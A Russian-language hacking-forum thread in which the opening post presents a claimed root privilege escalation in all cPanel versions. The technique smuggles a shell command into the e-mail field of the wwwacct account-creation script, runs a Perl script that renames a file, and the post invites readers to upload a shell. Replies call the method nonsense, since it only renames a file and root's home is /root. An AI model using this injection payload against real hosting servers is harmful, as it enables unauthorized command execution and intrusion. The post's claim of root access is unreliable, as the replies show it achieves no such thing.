![]() |
Cpanel all versions.
Cpanel Версия: все риск: очень высокий Этот баг может привести к поднятию привелегий до рута Cpanel самоя распространенная у хостеров предоставляющие площадки под сайт официальный сайт: Cpanel.net [code] Как это работает? Что происходит когда ты создаёш аккаунт ? ./script/wwwact [domainname] [username] [password] [Email address] lab lab lab Далее ты можеш запусьтить саму программу ! ( cpanel : doamin:2086) К примеру: http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab iЕсли запрос прошол значит у вас есть доступ к деректории скрипта (Th3 r00t) так ты можеш выполнять любые команды, к примеру ./scripts/wwwactt domain.com domain password (at) (dot) ir [email concealed];./home/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl) ()()()()()()()()()()()()() Проверим: ++++++++++++++++++++++++++ Шаг первый сохроните в фаил /home/user/public_html/do.pl . #!/usr/bin/perl $old='/home/user/public_html/test.txt'; $new='/home/root/kon.txt'; rename $old, $new; ++++++++++++++++++++++++++ Шаг второй пазовите фаил test.txt в твоей public_html директории. path will be : /home/user/public_html/test.txt . ++++++++++++++++++++++++++ Шаг третий создайте аккаунт с следушей командой: (at) (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box и нажмите нопку создать. Теперь ты сможеш видеть /home/root/ . ++++++++++++++++++++++++++ ()()()()()()()()()()()()() Ты можеш выполнить и ваш собственный код !Залить шелл и тп. |
эээ... ты просто переименовал каталог... а рутовый каталог вообще то находится по адресу /root
а "багу" ты сам нашел? или взял откуда то? потому что то что ты тут описал тебе абсолютно не даст... |
Сам понял, чего написал-то? :eek: Я знаю две local root уязвимости для CPanel:
http://www.milw0rm.com/exploits/2466 http://www.milw0rm.com/exploits/2554 Но это по-ходу не они... КВР, ответь на вопрос: у тебя самого это где-нибудь работало? :confused: |
ты посмотри что он делает.. он переименовывает каталог из /home/user в /home/root.. это ему ничего не даст так как рутовый каталог лежит по адресу /root а не /home/root.. поэтому все что тут описано на мой взгляд является полнейшим бредом
|
| Время: 09:29 |